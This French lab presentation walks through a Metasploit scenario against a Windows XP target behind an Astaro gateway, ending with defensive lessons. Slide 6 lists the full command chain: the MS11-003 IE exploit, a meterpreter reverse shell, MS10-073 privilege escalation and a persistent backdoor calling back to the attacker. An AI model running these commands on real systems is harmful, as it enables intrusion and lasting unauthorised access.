Le document présente un scénario d'attaque utilisant Metasploit sur un réseau comprenant un attaquant, une cible, et plusieurs contre-mesures de sécurité. Il explore l'exploitation de vulnérabilités spécifiques dans Internet Explorer et la gestion de privilèges sur une machine Windows. Les leçons tirées soulignent l'importance de la mise à jour régulière des systèmes et des applications, ainsi que la prudence face aux liens suspects.

1. Scénarios Metasploit
Scénario 3
Http://labs.zataz.com - Http://twitter.com/eromang

2. Scénario 3 : Topologie
Target Attacker
192.168.111.0/24 Astaro Gateway 192.168.178.0/24
Firewall Gateway
Astaro Security Gateway 8.102
Proxy HTTP/S Transparent
Anti-virus : Avira
eth0 : 192.168.111.250 (interface interne)
eth1 : 192.168.178.250 (interface externe)
Target (cible) Attacker (attaquant)
Windows XP SP3 IP : 192.168.178.21
Utilisateur « test » avec privilèges limités Metasploit
IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.250
Anti-virus : Dr.Web Security Space
Firewall : Windows Firewall
Vulnérabilités : Vulnérable à MS11-003 & MS10-073

3. Scénario 3 : Règles Firewall/Proxy
• Sur Astaro Security Gateway :
• Le réseau interne ne peut surfer sur Internet qu’en traversant le proxy HTTP/S transparent.
• Le réseau interne peut surfer sur n’importe quel site Internet, par le groupe «Web Surfing».
• Le groupe « Web Surfing » contient les autorisations suivantes :
• HTTP (80/TCP), HTTP Proxy (8080/TCP), HTTP Webcache (3128/TCP), HTTPS (443)
• Deux anti-virus scan en temps réel le traffic Internet (Avira & ClamAV)
• Sur la cible :
• Dr.Web anti-virus est installé, mais pas Dr.Web Firewall car pas proposé par défaut.
• Le Firewall local Windows est activé et configuré par défaut.

4. Scénario 3 : Story-Board
Cette topologie réseau correspond à certaines configurations ADSL d’internautes et aussi à la configuration de quelques
petites et moyennes entreprises.
The réseau cible à 5 contre-mesures :
• Une passerelle Firewall qui ne permet de surfer sur Internet que par le biais du groupe « Web Surf ».
• Un proxy transparent HTTP/S situé sur la passerelle Firewall.
• Deux antivirus, situé sur la passerelle Firewall, scannant en temps réel le surf sur Internet (Avira & ClamAV).
• Un anti-virus Dr.Web Security Space sur l’ordinateur cible, avec une configuration par défaut.
• Le Firewall local Windows activé sur l’ordinateur cible, avec une configuration par défaut.
Il existe des bugs ouverts (ID16438 - ID16255), pour les certificats «self-signed», sur ASG8, datant du 11-02-2011. Certain
sites web banquaire ne sont plus disponibles et les exceptions dans « Certificat Trust Check » ne fonctionne plus avec le
proxy en mode transparent. Comme contre-mesure Astaro recommande de désactiver le scan anti-viral HTTPS (SLL) !
http://www.astaro.com/lists/Known_Issues-ASG-V8.txt
Nous allons utiliser ces bugs connus en tant que vecteur d’attaque, car tous les ASG 8.100 et supérieur sont affectés. La
version 8.100 est disponible depuis le 20-01-2011. La version 8.103 corrigera les bugs.
La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout.
• MS11-003 sera notre point d’entrée.
• MS10-073 sera notre vecteur d’escalade de privilèges (Stuxnet).

5. Scénario 3 : Story-Board
L’attaquant envoi un message Twitter à la cible. Le message contient un lien malveillant dirigeant vers un site web
permettant d’exploiter la vulnérabilité MS11-003.
Un message d’alerte Internet Explorer sera affiché à propos du certificat HTTPS, sur la démonstration nous n’avons pas
de CA valide.
La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée. Après exploitation un «payload»
meterpreter reverse_tcp est initié vers l’attaque sur le port 8080/TCP.
L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancer l’attaque du type « escalade de
privilèges» MS10-073 :
• MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est la
solution pour récupérer la liste des patchs installés.
L’attaquant va exécuter l’escalade de privilèges MS10-073.
L’attaquant va installer une «backdoor» meterpreter reverse_tcp persistente en tant que service sur la cible.

6. Scénario 3 : Commandes
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 443
set SSL true
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set LPORT 8080
exploit
migrate X -> vers un autre processus
kill X -> 2 fois -> notepad.exe & et le processus iexplorer.exe
getuid
getprivs
getsystem
sysinfo
ipconfig
route
background
use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run
sessions -i 1
getuid
migrate X -> vers un processus «NT AUTHORITYSYSTEM»
run persistence -U -i 5 -p 8080 -r 192.168.178.21

7. Scénario 3 : Leçons apprises
• Mettre à jour son OS et ses applicatifs !
• Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues !
• Toujours analyser le traffic sortant HTTPS avec un anti-virus.
• Ne pas faire confiance à son anti-virus !
• Sélectionner un anti-virus qui est capable de détecter des attaques basiques !
• Ne pas faire confiance à ses Firewalls (Locaux ou distants) !
• Suivre les bugs connus et les « Release Notes » de vos applicatifs.
7